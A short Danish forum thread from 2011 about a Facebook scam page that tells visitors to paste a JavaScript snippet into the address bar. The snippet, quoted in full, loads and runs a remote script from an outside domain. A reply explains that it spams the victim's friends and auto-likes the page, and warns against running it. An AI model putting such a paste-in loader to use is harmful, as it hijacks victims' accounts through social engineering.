Avatar billede goya Novice
04. maj 2011 - 00:08 Der er 1 kommentar og
1 løsning

Mystisk javascript via Facebook

Har Via en bekendt på min face book liste fået poster et link på min wall der tager mig herhen:

http://www.facebook.com/pages/Osama-is-Dead-Watch-the-Video-Below/210548778969159?sk=app_190322544333196

Og beder mig om at at paste dette script ind i adresse feltet i browseren :

java script:(a=(b=document).createElement('script')).src='//brievela.info/init.js?'+Math.random(),b.body.appendChild(a);void(0) ....

Que pasa... hvad gør dette script ... er det et eller andet scam ??

Goya
Avatar billede Slettet bruger
04. maj 2011 - 01:15 #1
Siden opretter et nyt script element og implementerer alle funktioner fra scriptet http://brievela.info/init.js

Det script får din facebook profil til at poste samme link på alle dine venners vægge, samt skrive det i alle online venners chatvinduer.
Du bliver også automatisk fan af deres side.
Så vidt jeg kan se, får du ikke engang lov til at se videoen :p

Så det er det, vi i populær tale, kalder en facebook virus :)

Ergo, ikke udfør det de beder dig om ;)
Avatar billede goya Novice
04. maj 2011 - 01:51 #2
Tak Usefull info, tænkte nok at det var noget uldent i kanten, og har advaret på facebook ... Tnx Mate